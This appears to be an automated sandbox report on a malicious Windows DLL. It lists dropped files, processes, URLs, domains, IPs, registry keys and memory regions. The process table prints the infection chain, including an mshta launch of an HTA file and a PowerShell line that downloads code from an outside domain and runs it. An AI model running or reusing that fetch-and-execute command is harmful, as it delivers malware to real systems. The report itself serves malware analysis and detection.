Files
|
File Path
|
Type
|
Category
|
Malicious
|
|
|---|---|---|---|---|
|
SecuriteInfo.com.W64.Agent.HHB.gen.Eldorado.31565.22675.dll
|
PE32+ executable (DLL) (GUI) x86-64 (stripped to external PDB), for MS Windows
|
initial sample
|
 |
|
|
C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_rundll32.exe_Sec_ba134c84dd7c738b1da454e5ce8d5d9ceedd92a7_dcff542f_1597bca0-7975-43db-b362-651e89045a96\Report.wer
|
Unicode text, UTF-16, little-endian text, with CRLF line terminators
|
dropped
|
||
|
C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_rundll32.exe_Sec_ba134c84dd7c738b1da454e5ce8d5d9ceedd92a7_dcff542f_317fff3b-1333-401b-a41a-4f0ffcfc1028\Report.wer
|
Unicode text, UTF-16, little-endian text, with CRLF line terminators
|
dropped
|
||
|
C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_rundll32.exe_Sec_ba134c84dd7c738b1da454e5ce8d5d9ceedd92a7_dcff542f_d7a48954-9480-417b-bd34-d07d738933ed\Report.wer
|
Unicode text, UTF-16, little-endian text, with CRLF line terminators
|
dropped
|
||
|
C:\ProgramData\Microsoft\Windows\WER\Temp\WER2397.tmp.dmp
|
Mini DuMP crash report, 14 streams, Wed May 22 20:15:26 2024, 0x1205a4 type
|
dropped
|
||
|
C:\ProgramData\Microsoft\Windows\WER\Temp\WER23A6.tmp.dmp
|
Mini DuMP crash report, 14 streams, Wed May 22 20:15:26 2024, 0x1205a4 type
|
dropped
|
||
|
C:\ProgramData\Microsoft\Windows\WER\Temp\WER2473.tmp.WERInternalMetadata.xml
|
XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
|
dropped
|
||
|
C:\ProgramData\Microsoft\Windows\WER\Temp\WER2482.tmp.WERInternalMetadata.xml
|
XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
|
dropped
|
||
|
C:\ProgramData\Microsoft\Windows\WER\Temp\WER24B2.tmp.xml
|
XML 1.0 document, ASCII text, with CRLF line terminators
|
dropped
|
||
|
C:\ProgramData\Microsoft\Windows\WER\Temp\WER24C2.tmp.xml
|
XML 1.0 document, ASCII text, with CRLF line terminators
|
dropped
|
||
|
C:\ProgramData\Microsoft\Windows\WER\Temp\WER3B84.tmp.dmp
|
Mini DuMP crash report, 14 streams, Wed May 22 20:15:32 2024, 0x1205a4 type
|
dropped
|
||
|
C:\ProgramData\Microsoft\Windows\WER\Temp\WER3C21.tmp.WERInternalMetadata.xml
|
XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
|
dropped
|
||
|
C:\ProgramData\Microsoft\Windows\WER\Temp\WER3C51.tmp.xml
|
XML 1.0 document, ASCII text, with CRLF line terminators
|
dropped
|
||
|
C:\Users\Public\example.hta
|
HTML document, ASCII text, with CRLF line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\D81IGXZV\d[1].txt
|
HTML document, ASCII text, with CRLF line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache
|
data
|
dropped
|
||
|
C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
|
data
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_0a2bjsg2.ifw.psm1
|
ASCII text, with no line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_gdsydoz2.3fv.ps1
|
ASCII text, with no line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_lkxvwdnb.nyl.ps1
|
ASCII text, with no line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_s3xqybvw.m45.psm1
|
ASCII text, with no line terminators
|
dropped
|
||
|
C:\Windows\appcompat\Programs\Amcache.hve
|
MS Windows registry file, NT/2000 or above
|
dropped
|
||
|
C:\Windows\appcompat\Programs\Amcache.hve.tmp
|
MS Windows registry file, NT/2000 or above
|
dropped
|
||
|
C:\Windows\appcompat\Programs\Amcache.hve.tmp.LOG1
|
MS Windows registry file, NT/2000 or above
|
dropped
|
||
|
C:\Windows\appcompat\Programs\Amcache.hve.tmp.LOG2
|
MS Windows registry file, NT/2000 or above
|
dropped
|
There are 15 hidden files, click here to show them.
Processes
|
Path
|
Cmdline
|
Malicious
|
|
|---|---|---|---|
|
C:\Windows\System32\rundll32.exe
|
rundll32.exe C:\Users\user\Desktop\SecuriteInfo.com.W64.Agent.HHB.gen.Eldorado.31565.22675.dll,hash
|
|
|
|
C:\Windows\System32\rundll32.exe
|
rundll32.exe "C:\Users\user\Desktop\SecuriteInfo.com.W64.Agent.HHB.gen.Eldorado.31565.22675.dll",#1
|
|
|
|
C:\Windows\System32\rundll32.exe
|
rundll32.exe C:\Users\user\Desktop\SecuriteInfo.com.W64.Agent.HHB.gen.Eldorado.31565.22675.dll,xlAutoOpen
|
|
|
|
C:\Windows\SysWOW64\mshta.exe
|
"C:\Windows\SysWOW64\mshta.exe" "C:\users\public\example.hta" {1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}{1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}
mshta
|
|
|
|
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
|
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command Invoke-Expression (irm -Uri 'iapartmentlistings.com/tykhwuxk')
|
|
|
|
C:\Windows\System32\rundll32.exe
|
rundll32.exe "C:\Users\user\Desktop\SecuriteInfo.com.W64.Agent.HHB.gen.Eldorado.31565.22675.dll",hash
|
|
|
|
C:\Windows\System32\rundll32.exe
|
rundll32.exe "C:\Users\user\Desktop\SecuriteInfo.com.W64.Agent.HHB.gen.Eldorado.31565.22675.dll",xlAutoOpen
|
|
|
|
C:\Windows\SysWOW64\mshta.exe
|
"C:\Windows\SysWOW64\mshta.exe" "C:\users\public\example.hta" {1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}{1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}
mshta
|
|
|
|
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
|
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command Invoke-Expression (irm -Uri 'iapartmentlistings.com/tykhwuxk')
|
|
|
|
C:\Windows\System32\loaddll64.exe
|
loaddll64.exe "C:\Users\user\Desktop\SecuriteInfo.com.W64.Agent.HHB.gen.Eldorado.31565.22675.dll"
|
||
|
C:\Windows\System32\conhost.exe
|
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
|
||
|
C:\Windows\System32\cmd.exe
|
cmd.exe /C rundll32.exe "C:\Users\user\Desktop\SecuriteInfo.com.W64.Agent.HHB.gen.Eldorado.31565.22675.dll",#1
|
||
|
C:\Windows\System32\WerFault.exe
|
C:\Windows\system32\WerFault.exe -u -p 7788 -s 424
|
||
|
C:\Windows\System32\WerFault.exe
|
C:\Windows\system32\WerFault.exe -u -p 7824 -s 416
|
||
|
C:\Windows\System32\conhost.exe
|
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
|
||
|
C:\Windows\System32\WerFault.exe
|
C:\Windows\system32\WerFault.exe -u -p 5384 -s 416
|
||
|
C:\Windows\System32\conhost.exe
|
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
|
There are 7 hidden processes, click here to show them.
URLs
|
Name
|
IP
|
Malicious
|
|
|---|---|---|---|
|
https://www.siguefutbol.com/wp-content/plugins/wp-automatic/d.txtmshtaopen1697fe5eb0141dca1379090a4d
|
unknown
|
||
|
http://iapartmentlistings.com/tykhwuxk
|
91.222.173.38
|
||
|
http://upx.sf.net
|
unknown
|
||
|
https://www.siguefutbol.com/wp-content/plugins/wp-automatic/d.txt
|
194.124.213.167
|
||
|
https://www.siguefutbol.com/wp-content/plugins/wp-automatic/d.txt-Jx
|
unknown
|
||
|
https://www.siguefutbol.com/
|
unknown
|
||
|
https://www.siguefutbol.com/wp-content/plugins/wp-automatic/d.txt0Kq
|
unknown
|
||
|
https://www.siguefutbol.com/wp-content/plugins/wp-automatic/d.txt3Jx
|
unknown
|
||
|
https://www.siguefutbol.com/wp-content/plugins/wp-automatic/d.txtJ
|
unknown
|
||
|
https://www.siguefutbol.com/wp-content/plugins/wp-automatic/d.txtSy
|
unknown
|
Domains
|
Name
|
IP
|
Malicious
|
|
|---|---|---|---|
|
iapartmentlistings.com
|
91.222.173.38
|
|
|
|
siguefutbol.com
|
194.124.213.167
|
||
|
www.siguefutbol.com
|
unknown
|
IPs
|
IP
|
Domain
|
Country
|
Malicious
|
|
|---|---|---|---|---|
|
91.222.173.38
|
iapartmentlistings.com
|
Ukraine
|
|
|
|
194.124.213.167
|
siguefutbol.com
|
unknown
|
Registry
|
Path
|
Value
|
Malicious
|
|
|---|---|---|---|
|
\REGISTRY\A\{0526282b-f2f8-2cb8-e4cd-2c156edf009c}\Root\InventoryApplicationFile\rundll32.exe|c8d854bf61fafc41
|
ProgramId
|
||
|
\REGISTRY\A\{0526282b-f2f8-2cb8-e4cd-2c156edf009c}\Root\InventoryApplicationFile\rundll32.exe|c8d854bf61fafc41
|
FileId
|
||
|
\REGISTRY\A\{0526282b-f2f8-2cb8-e4cd-2c156edf009c}\Root\InventoryApplicationFile\rundll32.exe|c8d854bf61fafc41
|
LowerCaseLongPath
|
||
|
\REGISTRY\A\{0526282b-f2f8-2cb8-e4cd-2c156edf009c}\Root\InventoryApplicationFile\rundll32.exe|c8d854bf61fafc41
|
LongPathHash
|
||
|
\REGISTRY\A\{0526282b-f2f8-2cb8-e4cd-2c156edf009c}\Root\InventoryApplicationFile\rundll32.exe|c8d854bf61fafc41
|
Name
|
||
|
\REGISTRY\A\{0526282b-f2f8-2cb8-e4cd-2c156edf009c}\Root\InventoryApplicationFile\rundll32.exe|c8d854bf61fafc41
|
OriginalFileName
|
||
|
\REGISTRY\A\{0526282b-f2f8-2cb8-e4cd-2c156edf009c}\Root\InventoryApplicationFile\rundll32.exe|c8d854bf61fafc41
|
Publisher
|
||
|
\REGISTRY\A\{0526282b-f2f8-2cb8-e4cd-2c156edf009c}\Root\InventoryApplicationFile\rundll32.exe|c8d854bf61fafc41
|
Version
|
||
|
\REGISTRY\A\{0526282b-f2f8-2cb8-e4cd-2c156edf009c}\Root\InventoryApplicationFile\rundll32.exe|c8d854bf61fafc41
|
BinFileVersion
|
||
|
\REGISTRY\A\{0526282b-f2f8-2cb8-e4cd-2c156edf009c}\Root\InventoryApplicationFile\rundll32.exe|c8d854bf61fafc41
|
BinaryType
|
||
|
\REGISTRY\A\{0526282b-f2f8-2cb8-e4cd-2c156edf009c}\Root\InventoryApplicationFile\rundll32.exe|c8d854bf61fafc41
|
ProductName
|
||
|
\REGISTRY\A\{0526282b-f2f8-2cb8-e4cd-2c156edf009c}\Root\InventoryApplicationFile\rundll32.exe|c8d854bf61fafc41
|
ProductVersion
|
||
|
\REGISTRY\A\{0526282b-f2f8-2cb8-e4cd-2c156edf009c}\Root\InventoryApplicationFile\rundll32.exe|c8d854bf61fafc41
|
LinkDate
|
||
|
\REGISTRY\A\{0526282b-f2f8-2cb8-e4cd-2c156edf009c}\Root\InventoryApplicationFile\rundll32.exe|c8d854bf61fafc41
|
BinProductVersion
|
||
|
\REGISTRY\A\{0526282b-f2f8-2cb8-e4cd-2c156edf009c}\Root\InventoryApplicationFile\rundll32.exe|c8d854bf61fafc41
|
AppxPackageFullName
|
||
|
\REGISTRY\A\{0526282b-f2f8-2cb8-e4cd-2c156edf009c}\Root\InventoryApplicationFile\rundll32.exe|c8d854bf61fafc41
|
AppxPackageRelativeId
|
||
|
\REGISTRY\A\{0526282b-f2f8-2cb8-e4cd-2c156edf009c}\Root\InventoryApplicationFile\rundll32.exe|c8d854bf61fafc41
|
Size
|
||
|
\REGISTRY\A\{0526282b-f2f8-2cb8-e4cd-2c156edf009c}\Root\InventoryApplicationFile\rundll32.exe|c8d854bf61fafc41
|
Language
|
||
|
\REGISTRY\A\{0526282b-f2f8-2cb8-e4cd-2c156edf009c}\Root\InventoryApplicationFile\rundll32.exe|c8d854bf61fafc41
|
IsOsComponent
|
||
|
\REGISTRY\A\{0526282b-f2f8-2cb8-e4cd-2c156edf009c}\Root\InventoryApplicationFile\rundll32.exe|c8d854bf61fafc41
|
Usn
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\AppCompatFlags\{11517B7C-E79D-4e20-961B-75A811715ADD}
|
CreatingCommand
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\AppCompatFlags\{11517B7C-E79D-4e20-961B-75A811715ADD}
|
CreatingCommand
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\AppCompatFlags\{11517B7C-E79D-4e20-961B-75A811715ADD}
|
CreatingModule
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\AppCompatFlags
|
AmiHivePermissionsCorrect
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\AppCompatFlags
|
AmiHiveOwnerCorrect
|
||
|
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Session Manager
|
PendingFileRenameOperations
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\AppCompatFlags
|
AmiOverridePath
|
||
|
\REGISTRY\A\{e1e398d6-9775-c9b6-bbe4-f7da130f54cb}\Root\InventoryApplicationFile
|
WritePermissionsCheck
|
||
|
\REGISTRY\A\{e1e398d6-9775-c9b6-bbe4-f7da130f54cb}\Root\InventoryApplicationFile
|
ProviderSyncId
|
||
|
\REGISTRY\A\{e1e398d6-9775-c9b6-bbe4-f7da130f54cb}\Root\InventoryApplicationFile\rundll32.exe|c8d854bf61fafc41
|
ProgramId
|
||
|
\REGISTRY\A\{e1e398d6-9775-c9b6-bbe4-f7da130f54cb}\Root\InventoryApplicationFile\rundll32.exe|c8d854bf61fafc41
|
FileId
|
||
|
\REGISTRY\A\{e1e398d6-9775-c9b6-bbe4-f7da130f54cb}\Root\InventoryApplicationFile\rundll32.exe|c8d854bf61fafc41
|
LowerCaseLongPath
|
||
|
\REGISTRY\A\{e1e398d6-9775-c9b6-bbe4-f7da130f54cb}\Root\InventoryApplicationFile\rundll32.exe|c8d854bf61fafc41
|
LongPathHash
|
||
|
\REGISTRY\A\{e1e398d6-9775-c9b6-bbe4-f7da130f54cb}\Root\InventoryApplicationFile\rundll32.exe|c8d854bf61fafc41
|
Name
|
||
|
\REGISTRY\A\{e1e398d6-9775-c9b6-bbe4-f7da130f54cb}\Root\InventoryApplicationFile\rundll32.exe|c8d854bf61fafc41
|
OriginalFileName
|
||
|
\REGISTRY\A\{e1e398d6-9775-c9b6-bbe4-f7da130f54cb}\Root\InventoryApplicationFile\rundll32.exe|c8d854bf61fafc41
|
Publisher
|
||
|
\REGISTRY\A\{e1e398d6-9775-c9b6-bbe4-f7da130f54cb}\Root\InventoryApplicationFile\rundll32.exe|c8d854bf61fafc41
|
Version
|
||
|
\REGISTRY\A\{e1e398d6-9775-c9b6-bbe4-f7da130f54cb}\Root\InventoryApplicationFile\rundll32.exe|c8d854bf61fafc41
|
BinFileVersion
|
||
|
\REGISTRY\A\{e1e398d6-9775-c9b6-bbe4-f7da130f54cb}\Root\InventoryApplicationFile\rundll32.exe|c8d854bf61fafc41
|
BinaryType
|
||
|
\REGISTRY\A\{e1e398d6-9775-c9b6-bbe4-f7da130f54cb}\Root\InventoryApplicationFile\rundll32.exe|c8d854bf61fafc41
|
ProductName
|
||
|
\REGISTRY\A\{e1e398d6-9775-c9b6-bbe4-f7da130f54cb}\Root\InventoryApplicationFile\rundll32.exe|c8d854bf61fafc41
|
ProductVersion
|
||
|
\REGISTRY\A\{e1e398d6-9775-c9b6-bbe4-f7da130f54cb}\Root\InventoryApplicationFile\rundll32.exe|c8d854bf61fafc41
|
LinkDate
|
||
|
\REGISTRY\A\{e1e398d6-9775-c9b6-bbe4-f7da130f54cb}\Root\InventoryApplicationFile\rundll32.exe|c8d854bf61fafc41
|
BinProductVersion
|
||
|
\REGISTRY\A\{e1e398d6-9775-c9b6-bbe4-f7da130f54cb}\Root\InventoryApplicationFile\rundll32.exe|c8d854bf61fafc41
|
AppxPackageFullName
|
||
|
\REGISTRY\A\{e1e398d6-9775-c9b6-bbe4-f7da130f54cb}\Root\InventoryApplicationFile\rundll32.exe|c8d854bf61fafc41
|
AppxPackageRelativeId
|
||
|
\REGISTRY\A\{e1e398d6-9775-c9b6-bbe4-f7da130f54cb}\Root\InventoryApplicationFile\rundll32.exe|c8d854bf61fafc41
|
Size
|
||
|
\REGISTRY\A\{e1e398d6-9775-c9b6-bbe4-f7da130f54cb}\Root\InventoryApplicationFile\rundll32.exe|c8d854bf61fafc41
|
Language
|
||
|
\REGISTRY\A\{e1e398d6-9775-c9b6-bbe4-f7da130f54cb}\Root\InventoryApplicationFile\rundll32.exe|c8d854bf61fafc41
|
IsOsComponent
|
||
|
\REGISTRY\A\{e1e398d6-9775-c9b6-bbe4-f7da130f54cb}\Root\InventoryApplicationFile\rundll32.exe|c8d854bf61fafc41
|
Usn
|
||
|
HKEY_CURRENT_USER_Classes\Local Settings\Software\Microsoft\Windows\Shell\MuiCache
|
LangID
|
||
|
HKEY_CURRENT_USER_Classes\Local Settings\Software\Microsoft\Windows\Shell\MuiCache
|
C:\Windows\SysWOW64\mshta.exe.FriendlyAppName
|
||
|
HKEY_CURRENT_USER_Classes\Local Settings\Software\Microsoft\Windows\Shell\MuiCache
|
C:\Windows\SysWOW64\mshta.exe.ApplicationCompany
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing
|
EnableConsoleTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\powershell_RASAPI32
|
EnableFileTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\powershell_RASAPI32
|
EnableAutoFileTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\powershell_RASAPI32
|
EnableConsoleTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\powershell_RASAPI32
|
FileTracingMask
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\powershell_RASAPI32
|
ConsoleTracingMask
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\powershell_RASAPI32
|
MaxFileSize
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\powershell_RASAPI32
|
FileDirectory
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\powershell_RASMANCS
|
EnableFileTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\powershell_RASMANCS
|
EnableAutoFileTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\powershell_RASMANCS
|
EnableConsoleTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\powershell_RASMANCS
|
FileTracingMask
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\powershell_RASMANCS
|
ConsoleTracingMask
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\powershell_RASMANCS
|
MaxFileSize
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\powershell_RASMANCS
|
FileDirectory
|
||
|
HKEY_CURRENT_USER\SOFTWARE\Microsoft\IdentityCRL\Immersive\production\Token\{67082621-8D18-4333-9C64-10DE93676363}
|
DeviceTicket
|
||
|
HKEY_CURRENT_USER\SOFTWARE\Microsoft\IdentityCRL\Immersive\production\Token\{67082621-8D18-4333-9C64-10DE93676363}
|
DeviceId
|
||
|
HKEY_CURRENT_USER\SOFTWARE\Microsoft\IdentityCRL\Immersive\production\Token\{67082621-8D18-4333-9C64-10DE93676363}
|
ApplicationFlags
|
||
|
HKEY_CURRENT_USER\SOFTWARE\Microsoft\IdentityCRL\Immersive\production\Property
|
0018C00B8F8B0D2B
|
There are 61 hidden registries, click here to show them.
Memdumps
|
Base Address
|
Regiontype
|
Protect
|
Malicious
|
|
|---|---|---|---|---|
|
376E000
|
heap
|
page read and write
|
||
|
34A5000
|
heap
|
page read and write
|
||
|
3782000
|
heap
|
page read and write
|
||
|
9B7F000
|
heap
|
page read and write
|
||
|
2A39000
|
heap
|
page read and write
|
||
|
6824000
|
heap
|
page read and write
|
||
|
A670000
|
heap
|
page read and write
|
||
|
35B0000
|
heap
|
page read and write
|
||
|
2A1C000
|
heap
|
page read and write
|
||
|
374A000
|
heap
|
page read and write
|
||
|
9281E7D000
|
stack
|
page read and write
|
||
|
3772000
|
heap
|
page read and write
|
||
|
9B94000
|
heap
|
page read and write
|
||
|
32F7000
|
stack
|
page read and write
|
||
|
3715000
|
heap
|
page read and write
|
||
|
2312FE98000
|
heap
|
page read and write
|
||
|
376F000
|
heap
|
page read and write
|
||
|
3759000
|
heap
|
page read and write
|
||
|
2CDF9760000
|
heap
|
page read and write
|
||
|
CF154FC000
|
stack
|
page read and write
|
||
|
289E000
|
stack
|
page read and write
|
||
|
2820000
|
heap
|
page read and write
|
||
|
36BE000
|
heap
|
page read and write
|
||
|
25617EA0000
|
heap
|
page read and write
|
||
|
3791000
|
heap
|
page read and write
|
||
|
231301E0000
|
heap
|
page read and write
|
||
|
29EB000
|
heap
|
page read and write
|
||
|
7FFBBC709000
|
unkown
|
page read and write
|
||
|
2A2B000
|
heap
|
page read and write
|
||
|
373E000
|
heap
|
page read and write
|
||
|
5B1A000
|
heap
|
page read and write
|
||
|
AF80000
|
heap
|
page read and write
|
||
|
3715000
|
heap
|
page read and write
|
||
|
378C000
|
heap
|
page read and write
|
||
|
686C000
|
heap
|
page read and write
|
||
|
29F2000
|
heap
|
page read and write
|
||
|
55B6000
|
heap
|
page read and write
|
||
|
A970000
|
heap
|
page read and write
|
||
|
9B55000
|
heap
|
page read and write
|
||
|
685B000
|
heap
|
page read and write
|
||
|
25617AE0000
|
heap
|
page read and write
|
||
|
376C000
|
heap
|
page read and write
|
||
|
59AE000
|
stack
|
page read and write
|
||
|
685B000
|
heap
|
page read and write
|
||
|
6861000
|
heap
|
page read and write
|
||
|
231301A0000
|
heap
|
page read and write
|
||
|
29D0000
|
heap
|
page read and write
|
||
|
36F5000
|
heap
|
page read and write
|
||
|
58C4000
|
heap
|
page read and write
|
||
|
9B5E000
|
heap
|
page read and write
|
||
|
A15C000
|
stack
|
page read and write
|
||
|
19AC0F8D000
|
heap
|
page read and write
|
||
|
9722000
|
trusted library allocation
|
page read and write
|
||
|
5B0B000
|
heap
|
page read and write
|
||
|
9B51000
|
heap
|
page read and write
|
||
|
2A39000
|
heap
|
page read and write
|
||
|
29FC000
|
heap
|
page read and write
|
||
|
282A000
|
heap
|
page read and write
|
||
|
737436F000
|
stack
|
page read and write
|
||
|
19AC0F83000
|
heap
|
page read and write
|
||
|
29F6000
|
heap
|
page read and write
|
||
|
7FFBBC701000
|
unkown
|
page execute read
|
||
|
19AC2CB0000
|
remote allocation
|
page read and write
|
||
|
2A45000
|
heap
|
page read and write
|
||
|
29B0000
|
heap
|
page read and write
|
||
|
2A3C000
|
heap
|
page read and write
|
||
|
19AC0EF8000
|
heap
|
page read and write
|
||
|
686C000
|
heap
|
page read and write
|
||
|
5AD2000
|
heap
|
page read and write
|
||
|
681F000
|
stack
|
page read and write
|
||
|
375C000
|
heap
|
page read and write
|
||
|
36F6000
|
heap
|
page read and write
|
||
|
9281D7E000
|
stack
|
page read and write
|
||
|
7FFBBC709000
|
unkown
|
page read and write
|
||
|
299D000
|
heap
|
page read and write
|
||
|
9D8F000
|
stack
|
page read and write
|
||
|
F4C0C7F000
|
stack
|
page read and write
|
||
|
29A7000
|
heap
|
page read and write
|
||
|
29F4000
|
heap
|
page read and write
|
||
|
4DE23B6000
|
stack
|
page read and write
|
||
|
36E4000
|
heap
|
page read and write
|
||
|
2A3B000
|
heap
|
page read and write
|
||
|
3764000
|
heap
|
page read and write
|
||
|
2A2B000
|
heap
|
page read and write
|
||
|
5AE4000
|
heap
|
page read and write
|
||
|
4DE27FD000
|
stack
|
page read and write
|
||
|
507F000
|
stack
|
page read and write
|
||
|
463F000
|
heap
|
page read and write
|
||
|
5110000
|
trusted library allocation
|
page read and write
|
||
|
36ED000
|
heap
|
page read and write
|
||
|
9B59000
|
heap
|
page read and write
|
||
|
6823000
|
heap
|
page read and write
|
||
|
6867000
|
heap
|
page read and write
|
||
|
5B1A000
|
heap
|
page read and write
|
||
|
7FFBBC704000
|
unkown
|
page readonly
|
||
|
5780000
|
heap
|
page read and write
|
||
|
9281F78000
|
stack
|
page read and write
|
||
|
9281EFF000
|
stack
|
page read and write
|
||
|
375C000
|
heap
|
page read and write
|
||
|
3725000
|
heap
|
page read and write
|
||
|
29F6000
|
heap
|
page read and write
|
||
|
201A3443000
|
heap
|
page read and write
|
||
|
4DE2AFB000
|
stack
|
page read and write
|
||
|
29B0000
|
heap
|
page read and write
|
||
|
5080000
|
heap
|
page read and write
|
||
|
5B13000
|
heap
|
page read and write
|
||
|
A5F2000
|
heap
|
page read and write
|
||
|
4DE277F000
|
stack
|
page read and write
|
||
|
19AC2CB0000
|
remote allocation
|
page read and write
|
||
|
6866000
|
heap
|
page read and write
|
||
|
340E000
|
stack
|
page read and write
|
||
|
201A3370000
|
heap
|
page read and write
|
||
|
4DE2A78000
|
stack
|
page read and write
|
||
|
29F4000
|
heap
|
page read and write
|
||
|
192CA430000
|
heap
|
page read and write
|
||
|
38F6000
|
heap
|
page read and write
|
||
|
3732000
|
heap
|
page read and write
|
||
|
6860000
|
heap
|
page read and write
|
||
|
3715000
|
heap
|
page read and write
|
||
|
73742EC000
|
stack
|
page read and write
|
||
|
3784000
|
heap
|
page read and write
|
||
|
36A0000
|
heap
|
page read and write
|
||
|
A5FC000
|
heap
|
page read and write
|
||
|
201A3250000
|
heap
|
page read and write
|
||
|
19AC2E38000
|
heap
|
page read and write
|
||
|
36ED000
|
heap
|
page read and write
|
||
|
2830000
|
trusted library allocation
|
page read and write
|
||
|
2B4E000
|
stack
|
page read and write
|
||
|
5AF8000
|
heap
|
page read and write
|
||
|
A5DE000
|
heap
|
page read and write
|
||
|
928199E000
|
stack
|
page read and write
|
||
|
6866000
|
heap
|
page read and write
|
||
|
7FFBBC700000
|
unkown
|
page readonly
|
||
|
A5F1000
|
heap
|
page read and write
|
||
|
2CDF965D000
|
heap
|
page read and write
|
||
|
29EF000
|
heap
|
page read and write
|
||
|
3732000
|
heap
|
page read and write
|
||
|
5B0B000
|
heap
|
page read and write
|
||
|
1C83B7F000
|
stack
|
page read and write
|
||
|
29E2000
|
heap
|
page read and write
|
||
|
5AF8000
|
heap
|
page read and write
|
||
|
19AC0F63000
|
heap
|
page read and write
|
||
|
2A36000
|
heap
|
page read and write
|
||
|
2CDF9550000
|
heap
|
page read and write
|
||
|
3740000
|
heap
|
page read and write
|
||
|
36D1000
|
heap
|
page read and write
|
||
|
2312FE90000
|
heap
|
page read and write
|
||
|
4A54000
|
heap
|
page read and write
|
||
|
6820000
|
heap
|
page read and write
|
||
|
5AF6000
|
heap
|
page read and write
|
||
|
3735000
|
heap
|
page read and write
|
||
|
3776000
|
heap
|
page read and write
|
||
|
6861000
|
heap
|
page read and write
|
||
|
3480000
|
trusted library allocation
|
page read and write
|
||
|
5B15000
|
heap
|
page read and write
|
||
|
ABAC000
|
stack
|
page read and write
|
||
|
3770000
|
heap
|
page read and write
|
||
|
389F000
|
stack
|
page read and write
|
||
|
2A2B000
|
heap
|
page read and write
|
||
|
9281C7F000
|
stack
|
page read and write
|
||
|
2CDFAF70000
|
heap
|
page read and write
|
||
|
4DE297D000
|
stack
|
page read and write
|
||
|
2A3C000
|
heap
|
page read and write
|
||
|
201A34D0000
|
heap
|
page read and write
|
||
|
19AC2860000
|
heap
|
page read and write
|
||
|
36FE000
|
heap
|
page read and write
|
||
|
CF156FF000
|
stack
|
page read and write
|
||
|
AAAC000
|
stack
|
page read and write
|
||
|
3787000
|
heap
|
page read and write
|
||
|
27FF000
|
stack
|
page read and write
|
||
|
5AD1000
|
heap
|
page read and write
|
||
|
376D000
|
heap
|
page read and write
|
||
|
3740000
|
heap
|
page read and write
|
||
|
29FC000
|
heap
|
page read and write
|
||
|
373C000
|
heap
|
page read and write
|
||
|
6834000
|
heap
|
page read and write
|
||
|
9281DFE000
|
stack
|
page read and write
|
||
|
376D000
|
heap
|
page read and write
|
||
|
686C000
|
heap
|
page read and write
|
||
|
2CDF9770000
|
heap
|
page read and write
|
||
|
2CE000
|
stack
|
page read and write
|
||
|
9B59000
|
heap
|
page read and write
|
||
|
201A34F0000
|
heap
|
page read and write
|
||
|
9B51000
|
heap
|
page read and write
|
||
|
201A3378000
|
heap
|
page read and write
|
||
|
19AC2CB0000
|
remote allocation
|
page read and write
|
||
|
36F5000
|
heap
|
page read and write
|
||
|
28B0000
|
heap
|
page read and write
|
||
|
19AC0EB0000
|
heap
|
page read and write
|
||
|
3745000
|
heap
|
page read and write
|
